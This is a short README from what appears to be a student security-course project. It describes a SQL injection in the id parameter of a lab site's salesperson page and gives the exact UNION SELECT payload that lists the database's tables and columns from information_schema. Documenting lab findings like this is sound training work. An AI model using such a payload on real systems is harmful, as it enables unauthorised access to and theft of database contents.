faroukqazi/ProjectUnit8/README.md

 Vulnerability #1: SQL Injection

 Description: In the Find a Salesperson page, I used SQL injection in the URL.
 I injected code into the GET for id part of the URL https://35.184.88.145/blue/public/salesperson.php?id= This vulnerability enables the attacker to gain insecure access to the details in the tables and columns in the database.
+' AND 0 UNION SELECT 1,2,3,4,GROUP_CONCAT(table_name,0x2e,column_name,"\n") FROM information_schema.columns WHERE table_schema=database()--'

 <img src="blue-vuln1.gif">